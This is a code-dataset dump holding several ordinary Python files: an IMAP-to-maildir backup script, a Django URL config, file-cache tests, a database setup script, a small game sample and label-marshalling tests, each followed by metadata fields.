message.set_unixfrom("From %s %s" % (envfrom,
time.asctime(imap.parseInternalDate(i['date']))))
msgfile = mbox.add(message)
store_hash(db, msghash, msgfile, i['uid'])
log.debug(' NEW: ' + repr(i))
outdict['copied'] += 1
outdict['copiedbytes'] += i['size']
elif not check_message(db, mbox, uid=str(i['uid']), seencache=seencache):
# UID is missing in the database (old version needs updated)
log.debug('Adding uid %i to msghash %s', i['uid'], msghash)
add_uid_to_hash(db, msghash, i['uid'])
else:
log.debug('Unexpected turbo mode on uid %i', i['uid'])
# Update our counters.
outdict['handled'] += 1
outdict['turbo'] = folder.turbocounter()
if outdict['handled'] % 100 == 0:
percentage = ((outdict['handled'] + outdict['turbo'])/ float(outdict['total'])) * 100
log.info('Copied: %i, Turbo: %i, Seen: %i (%i%%, latest UID %i, date %s)' %
(outdict['copied'], outdict['turbo'], outdict['handled'],
percentage, i['uid'], i['date']))
outdict['lastuid'] = i['uid']
if (outdict['handled'] >= limit) and (limit > 0):
log.info('Limit of %i messages reached' % limit)
break
# Make sure this gets updated...
outdict['turbo'] = folder.turbocounter()
return outdict
def main():
""" main loop
"""
log.debug('Hello. Version %s' % version)
# Parse the command line and config file
options = parse_options(defaults)
# Check to make sure the mailbox type is valid (probably redundant)
if options.type not in ['maildir', 'mbox']:
raise ValueError("No valid mailbox type specified")
# Open mailbox and database, and copy messages
try:
if options.type == 'maildir':
mbox = open_mailbox_maildir(options.destination, options.create)
db = open_sql_session(os.path.join(options.destination, '.imap2maildir.sqlite'))
elif options.type == 'mbox':
mbox = open_mailbox_mbox(options.destination, options.create)
db = open_sql_session(options.destination + '.sqlite')
seencache = SeenMessagesCache()
# Connect to IMAP server
imapserver = simpleimap.Server(hostname=options.hostname,
username=options.username, password=<PASSWORD>.password,
port=options.port, ssl=options.ssl)
imap = imapserver.Get()
# Instantiate a folder
folder = imap.Folder(folder=options.remotefolder)
folder.__keepaliver__(imapserver.Keepalive)
result = copy_messages_by_folder(folder=folder,
db=db,
imap=imap,
mbox=mbox,
limit=options.maxmessages,
turbo=options.turbo,
mboxdash=options.mboxdash,
search=options.search,
seencache=seencache)
except (KeyboardInterrupt, SystemExit):
log.warning('Caught interrupt; clearing locks and safing database.')
mbox.unlock()
db.rollback()
raise
except:
log.exception('Exception! Clearing locks and safing database.')
mbox.unlock()
db.rollback()
raise
# Unlock the mailbox if locked.
mbox.unlock()
# Print results.
log.info('FINISHED: Turboed %(turbo)i, handled %(handled)i, copied %(copied)i (%(copiedbytes)i bytes), last UID was %(lastuid)i' % result)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
"""
Mirrors the contents of an IMAP4 mailbox into a local maildir or mbox.
Intended for keeping a local backup of a remote IMAP4 mailbox to protect
against loss. Very handy for backing up "[Gmail]/All Mail" from your
Gmail account, to snag all your archived mail. Re-running it on a regular
basis will update only the stuff it needs to.
Once I need to, I'll write a restore script ;-)
<NAME> <<EMAIL>>
TODO:
PEP-0008 compliance
- Docstrings
"""
version = "%prog 1.10.2 20101018"
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
import email
import getpass
import hashlib
import logging
import mailbox
import optparse
import os
import re
try:
import rfc822
except ImportError:
import rfc822py3 as rfc822
import simpleimap
import sqlite3
import sys
import time
# Handler for logging/debugging/output
log = logging.getLogger(__name__)
console = logging.StreamHandler()
log.addHandler(console)
# Some reasonable application defaults
defaults = {
'debug': 1,
'password': <PASSWORD>,
'hostname': 'imap.gmail.com',
'ssl': True,
'port': False,
'remotefolder': '[Gmail]/All Mail',
'create': False,
'maxmessages': 0,
'configfile': 'imap2maildir.conf',
'turbo': True,
'type': 'maildir',
'mboxdash': False,
'search': 'SEEN',
}
class SeenMessagesCache(object):
""" Cache for seen message UIDs and Hashes
"""
def __init__(self):
""" Constructor
"""
self.uids = None
self.hashes = None
class lazyMaildir(mailbox.Maildir):
""" Override the _refresh method, based on patch from
http://bugs.python.org/issue1607951
by A.M. Kuchling, 2009-05-02
"""
def __init__(self, dirname, factory=rfc822.Message, create=True):
"""Initialize a lazy Maildir instance."""
mailbox.Maildir.__init__(self, dirname, factory, create)
self._last_read = None # Records the last time we read cur/new
def _refresh(self):
"""Update table of contents mapping."""
new_mtime = os.path.getmtime(os.path.join(self._path, 'new'))
cur_mtime = os.path.getmtime(os.path.join(self._path, 'cur'))
if (self._last_read is not None and
new_mtime <= self._last_read and cur_mtime <= self._last_read):
return
self._toc = {}
def update_dir (subdir):
""" update_dir
"""
path = os.path.join(self._path, subdir)
for entry in os.listdir(path):
p = os.path.join(path, entry)
if os.path.isdir(p):
continue
uniq = entry.split(self.colon)[0]
self._toc[uniq] = os.path.join(subdir, entry)
update_dir('new')
update_dir('cur')
# We record the current time - 1sec so that, if _refresh() is called
# again in the same second, we will always re-read the mailbox
# just in case it's been modified. (os.path.mtime() only has
# 1sec resolution.) This results in a few unnecessary re-reads
# when _refresh() is called multiple times in the same second,
# but once the clock ticks over, we will only re-read as needed.
now = int(time.time() - 1)
self._last_read = time.time() - 1
def make_hash(size, date, msgid):
""" Returns a hash of a message given the size, date, and msgid thingies.
"""
return hashlib.sha1('%i::%s::%s' % (size, date, msgid)).hexdigest()
def open_sql_session(filename):
""" Opens a SQLite database, initializing it if required
"""
log.debug("Opening sqlite3 database '%s'" % filename)
conn = sqlite3.connect(filename)
c = conn.cursor()
# gather info about the seenmessages table
c.execute('pragma table_info(seenmessages)')
columns = ' '.join(i[1] for i in c.fetchall()).split()
if columns == []:
# need to create the seenmessages table
c.execute("""create table seenmessages
(hash text not null unique, mailfile text not null, uid integer, folder text)""")
else:
if not 'uid' in columns:
# old db; need to add a column for uid
c.execute("""alter table seenmessages add column uid integer""")
if not 'folder' in columns:
# need to add a column for folder
c.execute("""alter table seenmessages add column folder text""")
conn.commit()
return conn
def check_message(conn, mbox, hash=None, uid=None, seencache=None):
""" Checks to see if a given message exists.
"""
c = conn.cursor()
if seencache:
if seencache.hashes is None:
# Populate the hash cache
log.debug("Populating hash cache...")
seencache.hashes = {}
c.execute('select hash,folder,mailfile from seenmessages')
for result in c:
seencache.hashes[str(result[0])] = (result[1], result[2])
log.debug("Hash cache: %i hashes" % len(seencache.hashes))
if seencache.uids is None:
# Populate the uid cache
log.debug("Populating uid cache...")
seencache.uids = {}
c.execute('select uid,folder,mailfile from seenmessages')
for result in c:
seencache.uids[str(result[0])] = (result[1], result[2])
log.debug("Uid cache: %i uids" % len(seencache.uids))
if hash:
if str(hash) in seencache.hashes:
folder, mailfile = seencache.hashes[hash]
else:
c.execute('select folder,mailfile from seenmessages where hash=?', (hash,))
row = c.fetchone()
if row:
log.debug("Cache miss on hash %s", hash)
folder, mailfile = row
else:
return False
elif uid:
if str(uid) in seencache.uids:
folder, mailfile = seencache.uids[str(uid)]
else:
c.execute('select folder,mailfile from seenmessages where uid=?', (uid,))
row = c.fetchone()
if row:
log.debug("Cache miss on uid %s" % uid)
folder, mailfile = row
else:
return False
else:
return False
if str(mailfile).startswith('POISON-'):
# This is a fake poison filename! Assume truth.
log.warning("Poison filename detected; assuming the message "
"exists and all is well: %s :: %s",
hash or uid, mailfile)
return True
elif isinstance(mbox, mailbox.mbox):
# mailfile will be an int
return int(mailfile) in mbox
elif isinstance(mbox, lazyMaildir):
# mailfile will be a string; use mbox.get because it is faster
if folder:
fmbox = mbox.get_folder(folder)
return fmbox.get(mailfile)
return mbox.get(mailfile)
else:
# uhh let's wing it
return mailfile in mbox
def store_hash(conn, hash, mailfile, uid):
""" Given a database connection, hash, mailfile, and uid,
stashes it in the database
"""
c = conn.cursor()
# nuke it if it's already there. (can happen if disk file goes away)
cur = c.execute('delete from seenmessages where hash = ?', (hash, ))
if cur.rowcount > 0:
log.debug('!!! Nuked duplicate hash %s' % hash)
c.execute('insert into seenmessages values (?,?,?,?)', (hash, mailfile, uid, ''))
conn.commit()
def add_uid_to_hash(conn, hash, uid):
""" Adds a uid to a hash that's missing its uid
"""
c = conn.cursor()
c.execute('update seenmessages set uid = ? where hash = ?', (uid, hash))
conn.commit()
def open_mailbox_maildir(directory, create=False):
""" There is a mailbox here.
"""
return lazyMaildir(directory, create=create)
def open_mailbox_mbox(filename, create=False):
""" Open a mbox file, lock for writing
"""
mbox = mailbox.mbox(filename, create=create)
mbox.lock()
return mbox
def smells_like_maildir(working_dir):
""" Quick check for the cur/tmp/new folders
"""
return os.path.exists(os.path.join(working_dir, 'cur')) and \
os.path.exists(os.path.join(working_dir, 'new')) and \
os.path.exists(os.path.join(working_dir, 'tmp'))
def parse_config_file(defaults,configfile='imap2maildir.conf'):
""" Parse config file, if exists.
Returns a tuple with a ConfigParser instance and either True or
False, depending on whether the config was read...
"""
config = ConfigParser(defaults)
if config.read(configfile):
log.debug('Reading config from ' + configfile)
return (config, True)
else:
log.debug('No config found at ' + configfile)
return (config, False)
class FirstOptionParser(optparse.OptionParser):
""" Adjusts parse_args so it won't complain too heavily about
options that don't exist.
Lifted lock, stock, and barrel from /usr/lib/python2.6/optparse.py
"""
def parse_args(self, args=None, values=None):
"""
parse_args(args : [string] = sys.argv[1:],
values : Values = None)
-> (values : Values, args : [string])
Parse the command-line options found in 'args' (default:
sys.argv[1:]). Any errors result in a call to 'error()', which
by default prints the usage message to stderr and calls
sys.exit() with an error message. On success returns a pair
(values, args) where 'values' is an Values instance (with all
your option values) and 'args' is the list of arguments left
over after parsing options.
"""
rargs = self._get_args(args)
if values is None:
values = self.get_default_values()
self.rargs = rargs
self.largs = largs = []
self.values = values
while 1:
try:
stop = self._process_args(largs, rargs, values)
break
except optparse.BadOptionError:
# Just a bad option, let's try this again
pass
except (optparse.OptionValueError) as err:
self.error(str(err))
args = largs + rargs
return self.check_values(values, args)
def parse_options(defaults):
""" First round of command line parsing: look for a -c option.
"""
firstparser = FirstOptionParser(add_help_option=False)
firstparser.set_defaults(configfile=defaults['configfile'])
firstparser.add_option("-c", "--config-file", dest="configfile")
(firstoptions, firstargs) = firstparser.parse_args()
# Parse a config file
(parsedconfig, gotconfig) = parse_config_file(
defaults, configfile=firstoptions.configfile)
# Parse command line options
usage = "usage: %prog [options]"
description = "A script to copy a remote IMAP folder to a local mail "
description += "storage area. Ideal for incremental backups of mail "
description += "from free webmail providers, or perhaps as an "
description += "alternative to fetchmail. Supports mbox and maildir, "
description += "despite the name. "
description += "See COPYRIGHT for your rights; "
description += "https://github.com/rtucker/imap2maildir/ for info."
if gotconfig:
description = description + '\n\nConfiguration defaults read from \
file "%s"' % firstoptions.configfile
parser = optparse.OptionParser(usage=usage, version=version,
description=description)
# Set up some groups
required = optparse.OptionGroup(parser, "Required options")
optional = optparse.OptionGroup(parser, "Optional and debugging options")
# Set the defaults...
if gotconfig: sectionname = 'imap2maildir'
else: sectionname = 'DEFAULT'
clist = parsedconfig.items(sectionname, raw=True)
for i in clist:
iname = i[0]
if i[1] == 'False': ivalue = False
elif i[1] == 'True': ivalue = True
elif i[0] in ['port', 'debug', 'maxmessages']: ivalue = int(i[1])
else: ivalue = i[1]
parser.set_default(iname, ivalue)
# Define the individual options
required.add_option("-u", "--username", dest="username",
help="Username for authentication to IMAP server", metavar="USERNAME")
required.add_option("-d", "--destination", dest="destination",
help="Where to store the mail, e.g. ~/Backups/Gmail",
metavar="PATH")
optional.add_option("-p", "--password", dest="password",
help="Password for IMAP server. Default: prompt user",
metavar="PASSWORD")
optional.add_option("-H", "--hostname", dest="hostname",
help="Hostname of IMAP server, default: %default", metavar="HOSTNAME")
optional.add_option("-P", "--port", dest="port",
help="Port number. Default: 993 (SSL), 143 (clear)", metavar="PORT")
optional.add_option("-v", "--verbose", dest="debug",
help="Turns up the verbosity", action="store_const", const=2)
optional.add_option("-q", "--quiet", dest="debug",
help="Quiets all output (except prompts and errors)",
action="store_const", const=0)
optional.add_option("-r", "--remote-folder", dest="remotefolder",
help="Remote IMAP folder. Default: %default",
metavar="FOLDERNAME")
optional.add_option("-s", "--search", dest="search",
help="IMAP4 search criteria to use. Default: %default",
metavar="CRITERIA")
optional.add_option("--create", dest="create",
help="If --destination doesn't exist, create it", action="store_true")
optional.add_option("--no-turbo", "-T", dest="turbo",
help="Check for message locally before asking IMAP. Default: %default",
action="store_false")
optional.add_option("-m", "--max-messages", dest="maxmessages",
help="How many messages to process in one run (0=infinite). " +
"Default: %default",
metavar="MAX", type="int")
optional.add_option("-c", "--config-file", dest="configfile",
help="Configuration file to use. Default: %default")
optional.add_option("-S", "--ssl", dest="ssl",
help="Use SSL to connect, default: %default", action="store_true")
optional.add_option("-t", "--type", dest="type", action="store",
help="Mailbox type. Choice of: maildir, mbox. Default: %default",
choices=['maildir', 'mbox'])
optional.add_option("--mboxdash", dest="mboxdash", action="store_true",
help="Use - in the mbox From line instead of sender's address. " +
"Default: %default")
# Parse
parser.add_option_group(required)
parser.add_option_group(optional)
(options, args) = parser.parse_args()
# Check for required options
if not options.username:
parser.error("Must specify a username (-u/--username).")
if not options.destination:
parser.error("Must specify a destination directory (-d/--destination).")
if not os.path.exists(options.destination):
if options.create:
pass
else:
parser.error("Destination '%s' does not exist. Use --create."
% options.destination)
elif (options.type == 'maildir'
and not smells_like_maildir(options.destination)):
parser.error("Directory '%s' exists, but it isn't a maildir."
% options.destination)
if not options.password:
options.password = <PASSWORD>()
# Set up debugging
if options.debug == 0:
log.setLevel(logging.ERROR)
elif options.debug == 1:
log.setLevel(logging.INFO)
else:
log.setLevel(logging.DEBUG)
return options
def copy_messages_by_folder(folder, db, imap, mbox, limit=0, turbo=False,
mboxdash=False, search=None, seencache=None):
"""Copies any messages that haven't yet been seen from imap to mbox.
copy_messages_by_folder(folder=simpleimap.SimpleImapSSL().Folder(),
db=open_sql_session(),
imap=simpleimap.SimpleImapSSL(),
mbox=open_mailbox_*(),
limit=max number of messages to handle (0 = inf),
turbo=boolean,
mboxdash=use '-' for mbox From line email?,
search=imap criteria (string),
seencache=an object to cache seen messages,
Returns: {'total': total length of folder,
'handled': total messages handled,
'copied': total messages copied,
'copiedbytes': size of total messages copied,
'lastuid': last UID seen}
"""
outdict = {'turbo': 0, 'handled': 0, 'copied': 0, 'copiedbytes': 0, 'lastuid': 0}
outdict['total'] = len(folder)
log.info("Synchronizing %i messages from %s:%s to %s..." % (outdict['total'], folder.host, folder.folder, mbox._path))
msgpath = os.path.join(mbox._path, 'new')
if turbo:
# This will pass the check_message function and some useful cargo
# along to the Summaries() function in the FolderClass. It will
# use this to check the local cache for the message before hitting
# the outside world. (TODO: Make this less suckful.)
log.debug('TURBO MODE ENGAGED!')
folder.__turbo__(lambda uid: check_message(db, mbox, uid=str(uid), seencache=seencache))
else:
log.debug('Not using turbo mode...')
folder.__turbo__(None)
# Iterate through the message summary dicts for the folder.
for i in folder.Summaries(search=search):
# i = {'uid': , 'msgid': , 'size': , 'date': }
# Seen it yet?
msghash = make_hash(i['size'], i['date'], i['msgid'])
if not check_message(db, mbox, hash=msghash, seencache=seencache):
# Hash not found, copy it.
try:
message = imap.get_message_by_uid(i['uid'])
except Exception:
log.exception('ERROR: Could not retrieve message: %s' % repr(i))
if outdict['handled'] < 1:
log.error("Adding message hash %s to seencache, to avoid "
"future problems...", msghash)
store_hash(db, msghash, 'POISON-%s' % msghash, i['uid'])
add_uid_to_hash(db, msghash, i['uid'])
break
if mboxdash:
envfrom = '-'
else:
envfrom = i['envfrom']
message.set_unixfrom("From %s %s" % (envfrom,
time.asctime(imap.parseInternalDate(i['date']))))
msgfile = mbox.add(message)
store_hash(db, msghash, msgfile, i['uid'])
log.debug(' NEW: ' + repr(i))
outdict['copied'] += 1
outdict['copiedbytes'] += i['size']
elif not check_message(db, mbox, uid=str(i['uid']), seencache=seencache):
# UID is missing in the database (old version needs updated)
log.debug('Adding uid %i to msghash %s', i['uid'], msghash)
add_uid_to_hash(db, msghash, i['uid'])
else:
log.debug('Unexpected turbo mode on uid %i', i['uid'])
# Update our counters.
outdict['handled'] += 1
outdict['turbo'] = folder.turbocounter()
if outdict['handled'] % 100 == 0:
percentage = ((outdict['handled'] + outdict['turbo'])/ float(outdict['total'])) * 100
log.info('Copied: %i, Turbo: %i, Seen: %i (%i%%, latest UID %i, date %s)' %
(outdict['copied'], outdict['turbo'], outdict['handled'],
percentage, i['uid'], i['date']))
outdict['lastuid'] = i['uid']
if (outdict['handled'] >= limit) and (limit > 0):
log.info('Limit of %i messages reached' % limit)
break
# Make sure this gets updated...
outdict['turbo'] = folder.turbocounter()
return outdict
def main():
""" main loop
"""
log.debug('Hello. Version %s' % version)
# Parse the command line and config file
options = parse_options(defaults)
# Check to make sure the mailbox type is valid (probably redundant)
if options.type not in ['maildir', 'mbox']:
raise ValueError("No valid mailbox type specified")
# Open mailbox and database, and copy messages
try:
if options.type == 'maildir':
mbox = open_mailbox_maildir(options.destination, options.create)
db = open_sql_session(os.path.join(options.destination, '.imap2maildir.sqlite'))
elif options.type == 'mbox':
mbox = open_mailbox_mbox(options.destination, options.create)
db = open_sql_session(options.destination + '.sqlite')
seencache = SeenMessagesCache()
# Connect to IMAP server
imapserver = simpleimap.Server(hostname=options.hostname,
username=options.username, password=<PASSWORD>.password,
port=options.port, ssl=options.ssl)
imap = imapserver.Get()
# Instantiate a folder
folder = imap.Folder(folder=options.remotefolder)
folder.__keepaliver__(imapserver.Keepalive)
result = copy_messages_by_folder(folder=folder,
db=db,
imap=imap,
mbox=mbox,
limit=options.maxmessages,
turbo=options.turbo,
mboxdash=options.mboxdash,
search=options.search,
seencache=seencache)
except (KeyboardInterrupt, SystemExit):
log.warning('Caught interrupt; clearing locks and safing database.')
mbox.unlock()
db.rollback()
raise
except:
log.exception('Exception! Clearing locks and safing database.')
mbox.unlock()
db.rollback()
raise
# Unlock the mailbox if locked.
mbox.unlock()
# Print results.
log.info('FINISHED: Turboed %(turbo)i, handled %(handled)i, copied %(copied)i (%(copiedbytes)i bytes), last UID was %(lastuid)i' % result)
if __name__ == "__main__":
main()
|
en
| 0.730282
|
#!/usr/bin/env python Mirrors the contents of an IMAP4 mailbox into a local maildir or mbox. Intended for keeping a local backup of a remote IMAP4 mailbox to protect against loss. Very handy for backing up "[Gmail]/All Mail" from your Gmail account, to snag all your archived mail. Re-running it on a regular basis will update only the stuff it needs to. Once I need to, I'll write a restore script ;-) <NAME> <<EMAIL>> TODO: PEP-0008 compliance - Docstrings # Handler for logging/debugging/output # Some reasonable application defaults Cache for seen message UIDs and Hashes Constructor Override the _refresh method, based on patch from http://bugs.python.org/issue1607951 by A.M. Kuchling, 2009-05-02 Initialize a lazy Maildir instance. # Records the last time we read cur/new Update table of contents mapping. update_dir # We record the current time - 1sec so that, if _refresh() is called # again in the same second, we will always re-read the mailbox # just in case it's been modified. (os.path.mtime() only has # 1sec resolution.) This results in a few unnecessary re-reads # when _refresh() is called multiple times in the same second, # but once the clock ticks over, we will only re-read as needed. Returns a hash of a message given the size, date, and msgid thingies. Opens a SQLite database, initializing it if required # gather info about the seenmessages table # need to create the seenmessages table create table seenmessages (hash text not null unique, mailfile text not null, uid integer, folder text) # old db; need to add a column for uid alter table seenmessages add column uid integer # need to add a column for folder alter table seenmessages add column folder text Checks to see if a given message exists. # Populate the hash cache # Populate the uid cache # This is a fake poison filename! Assume truth. # mailfile will be an int # mailfile will be a string; use mbox.get because it is faster # uhh let's wing it Given a database connection, hash, mailfile, and uid, stashes it in the database # nuke it if it's already there. (can happen if disk file goes away) Adds a uid to a hash that's missing its uid There is a mailbox here. Open a mbox file, lock for writing Quick check for the cur/tmp/new folders Parse config file, if exists. Returns a tuple with a ConfigParser instance and either True or False, depending on whether the config was read... Adjusts parse_args so it won't complain too heavily about options that don't exist. Lifted lock, stock, and barrel from /usr/lib/python2.6/optparse.py parse_args(args : [string] = sys.argv[1:], values : Values = None) -> (values : Values, args : [string]) Parse the command-line options found in 'args' (default: sys.argv[1:]). Any errors result in a call to 'error()', which by default prints the usage message to stderr and calls sys.exit() with an error message. On success returns a pair (values, args) where 'values' is an Values instance (with all your option values) and 'args' is the list of arguments left over after parsing options. # Just a bad option, let's try this again First round of command line parsing: look for a -c option. # Parse a config file # Parse command line options # Set up some groups # Set the defaults... # Define the individual options # Parse # Check for required options # Set up debugging Copies any messages that haven't yet been seen from imap to mbox. copy_messages_by_folder(folder=simpleimap.SimpleImapSSL().Folder(), db=open_sql_session(), imap=simpleimap.SimpleImapSSL(), mbox=open_mailbox_*(), limit=max number of messages to handle (0 = inf), turbo=boolean, mboxdash=use '-' for mbox From line email?, search=imap criteria (string), seencache=an object to cache seen messages, Returns: {'total': total length of folder, 'handled': total messages handled, 'copied': total messages copied, 'copiedbytes': size of total messages copied, 'lastuid': last UID seen} # This will pass the check_message function and some useful cargo # along to the Summaries() function in the FolderClass. It will # use this to check the local cache for the message before hitting # the outside world. (TODO: Make this less suckful.) # Iterate through the message summary dicts for the folder. # i = {'uid': , 'msgid': , 'size': , 'date': } # Seen it yet? # Hash not found, copy it. # UID is missing in the database (old version needs updated) # Update our counters. # Make sure this gets updated... main loop # Parse the command line and config file # Check to make sure the mailbox type is valid (probably redundant) # Open mailbox and database, and copy messages # Connect to IMAP server # Instantiate a folder # Unlock the mailbox if locked. # Print results.
| 2.625713
| 3
|
api_students/api/urls.py
|
da-semenov/loft_test
| 0
|
6627645
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from rest_framework_simplejwt.views import (TokenObtainPairView,
TokenRefreshView)
from api.views import StudentViewSet
v1_router = DefaultRouter()
v1_router.register('students', StudentViewSet, basename='Student')
urlpatterns = [
path('v1/', include(v1_router.urls)),
path('v1/token/', TokenObtainPairView.as_view(),
name='token_obtain_pair'),
path('v1/token/refresh/', TokenRefreshView.as_view(),
name='token_refresh'),
]
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from rest_framework_simplejwt.views import (TokenObtainPairView,
TokenRefreshView)
from api.views import StudentViewSet
v1_router = DefaultRouter()
v1_router.register('students', StudentViewSet, basename='Student')
urlpatterns = [
path('v1/', include(v1_router.urls)),
path('v1/token/', TokenObtainPairView.as_view(),
name='token_obtain_pair'),
path('v1/token/refresh/', TokenRefreshView.as_view(),
name='token_refresh'),
]
|
none
| 1
| 1.96137
| 2
|
|
python_modules/dagster/dagster_tests/core_tests/storage_tests/test_local_file_cache.py
|
dbatten5/dagster
| 4,606
|
6627646
|
import io
import os
from dagster import LocalFileHandle
from dagster.core.storage.file_cache import FSFileCache
from dagster.utils.temp_file import get_temp_dir
def test_fs_file_cache_write_data():
bytes_object = io.BytesIO(b"bar")
with get_temp_dir() as temp_dir:
file_cache = FSFileCache(temp_dir)
assert not file_cache.has_file_object("foo")
assert file_cache.write_file_object("foo", bytes_object)
file_handle = file_cache.get_file_handle("foo")
assert isinstance(file_handle, LocalFileHandle)
assert file_handle.path_desc == os.path.join(temp_dir, "foo")
def test_fs_file_cache_write_binary_data():
with get_temp_dir() as temp_dir:
file_store = FSFileCache(temp_dir)
assert not file_store.has_file_object("foo")
assert file_store.write_binary_data("foo", b"bar")
file_handle = file_store.get_file_handle("foo")
assert isinstance(file_handle, LocalFileHandle)
assert file_handle.path_desc == os.path.join(temp_dir, "foo")
def test_empty_file_cache():
with get_temp_dir() as temp_dir:
file_cache = FSFileCache(temp_dir)
assert not file_cache.has_file_object("kjdfkd")
|
import io
import os
from dagster import LocalFileHandle
from dagster.core.storage.file_cache import FSFileCache
from dagster.utils.temp_file import get_temp_dir
def test_fs_file_cache_write_data():
bytes_object = io.BytesIO(b"bar")
with get_temp_dir() as temp_dir:
file_cache = FSFileCache(temp_dir)
assert not file_cache.has_file_object("foo")
assert file_cache.write_file_object("foo", bytes_object)
file_handle = file_cache.get_file_handle("foo")
assert isinstance(file_handle, LocalFileHandle)
assert file_handle.path_desc == os.path.join(temp_dir, "foo")
def test_fs_file_cache_write_binary_data():
with get_temp_dir() as temp_dir:
file_store = FSFileCache(temp_dir)
assert not file_store.has_file_object("foo")
assert file_store.write_binary_data("foo", b"bar")
file_handle = file_store.get_file_handle("foo")
assert isinstance(file_handle, LocalFileHandle)
assert file_handle.path_desc == os.path.join(temp_dir, "foo")
def test_empty_file_cache():
with get_temp_dir() as temp_dir:
file_cache = FSFileCache(temp_dir)
assert not file_cache.has_file_object("kjdfkd")
|
none
| 1
| 2.356035
| 2
|
|
database_creator.py
|
Tasari/Restaurant_system
| 0
|
6627647
|
<reponame>Tasari/Restaurant_system
import tables.stock
import tables.recipes
import tables.order_product
import tables.order
import tables.products
import tables.worker
from base_template import engine, Base, Session
Base.metadata.create_all(engine)
session = Session()
worker = tables.worker.Worker('Guest', 'guest', 'guest')
worker.promotion(50)
session.add(worker)
"""session.query(tables.stock.Stock).\
update({tables.stock.Stock.quantity: 500})"""
session.commit()
session.close()
|
import tables.stock
import tables.recipes
import tables.order_product
import tables.order
import tables.products
import tables.worker
from base_template import engine, Base, Session
Base.metadata.create_all(engine)
session = Session()
worker = tables.worker.Worker('Guest', 'guest', 'guest')
worker.promotion(50)
session.add(worker)
"""session.query(tables.stock.Stock).\
update({tables.stock.Stock.quantity: 500})"""
session.commit()
session.close()
|
zh
| 0.15294
|
session.query(tables.stock.Stock).\ update({tables.stock.Stock.quantity: 500})
| 1.805089
| 2
|
puppy/data/p/Puppy/Welcome/sample.py
|
y-akinobu/puppy
| 3
|
6627648
|
<reponame>y-akinobu/puppy
B = Rectangle(500, 950, width=1000, height=100, isStatic=true)
A = Ball(100,100,strokeStyle="yellow",lineWidth=30,width=100,height=100,fillStyle="green")
print("Hello")
def suzume_collision():
print("Bomb!")
def suzume_clicked():
print("Chun")
suzume = Circle(500,100,image='bird.png',width=270,clicked=suzume_clicked,collisionStart=suzume_collision)
for x in [100,200,300,400]:
print('Hi!!', font='48px Arial',fontStyle='green')
|
B = Rectangle(500, 950, width=1000, height=100, isStatic=true)
A = Ball(100,100,strokeStyle="yellow",lineWidth=30,width=100,height=100,fillStyle="green")
print("Hello")
def suzume_collision():
print("Bomb!")
def suzume_clicked():
print("Chun")
suzume = Circle(500,100,image='bird.png',width=270,clicked=suzume_clicked,collisionStart=suzume_collision)
for x in [100,200,300,400]:
print('Hi!!', font='48px Arial',fontStyle='green')
|
none
| 1
| 3.623359
| 4
|
|
anthemtool/io/providers/base.py
|
xyrin88/anthemtool
| 14
|
6627649
|
<reponame>xyrin88/anthemtool
import abc
class Decompressor(abc.ABC):
"""
Abstract interface for decompressor implementations.
"""
@abc.abstractmethod
def decompress(self, payload: bytes, size: int, output_size: int) -> bytes:
"""
Decompress the given payload.
"""
raise Exception("Not implemented")
|
import abc
class Decompressor(abc.ABC):
"""
Abstract interface for decompressor implementations.
"""
@abc.abstractmethod
def decompress(self, payload: bytes, size: int, output_size: int) -> bytes:
"""
Decompress the given payload.
"""
raise Exception("Not implemented")
|
en
| 0.662644
|
Abstract interface for decompressor implementations. Decompress the given payload.
| 3.500427
| 4
|
tests/drum/test_data_marshalling.py
|
andreakropp/datarobot-user-models
| 0
|
6627650
|
from datarobot_drum.drum.utils import _order_by_float, _can_be_converted_to_float, marshal_labels
def test_marshal_labels():
assert marshal_labels(expected_labels=["True", "False"], actual_labels=[False, True]) == [
"False",
"True",
]
def test__order_by_float():
assert _order_by_float(["0", "01"], ["1.0", ".0"]) == ["01", "0"]
assert _order_by_float(["0", "1"], [1.0, 0.0]) == ["1", "0"]
assert _order_by_float(["0", "1"], ["1.0", "0.0"]) == ["1", "0"]
assert _order_by_float(["0.0", "1"], ["1", ".0"]) == ["1", "0.0"]
assert _order_by_float(["1.0", "2.4", "0.4", "1.4"], [2.4, 1.0, 0.4, 1.4]) == [
"2.4",
"1.0",
"0.4",
"1.4",
]
def test_can_be_converted():
assert _can_be_converted_to_float(["05.99999999", "0.2", "-.13"])
assert not _can_be_converted_to_float(["1.0_", "1", "2"])
|
from datarobot_drum.drum.utils import _order_by_float, _can_be_converted_to_float, marshal_labels
def test_marshal_labels():
assert marshal_labels(expected_labels=["True", "False"], actual_labels=[False, True]) == [
"False",
"True",
]
def test__order_by_float():
assert _order_by_float(["0", "01"], ["1.0", ".0"]) == ["01", "0"]
assert _order_by_float(["0", "1"], [1.0, 0.0]) == ["1", "0"]
assert _order_by_float(["0", "1"], ["1.0", "0.0"]) == ["1", "0"]
assert _order_by_float(["0.0", "1"], ["1", ".0"]) == ["1", "0.0"]
assert _order_by_float(["1.0", "2.4", "0.4", "1.4"], [2.4, 1.0, 0.4, 1.4]) == [
"2.4",
"1.0",
"0.4",
"1.4",
]
def test_can_be_converted():
assert _can_be_converted_to_float(["05.99999999", "0.2", "-.13"])
assert not _can_be_converted_to_float(["1.0_", "1", "2"])
|
none
| 1
| 2.513078
| 3
|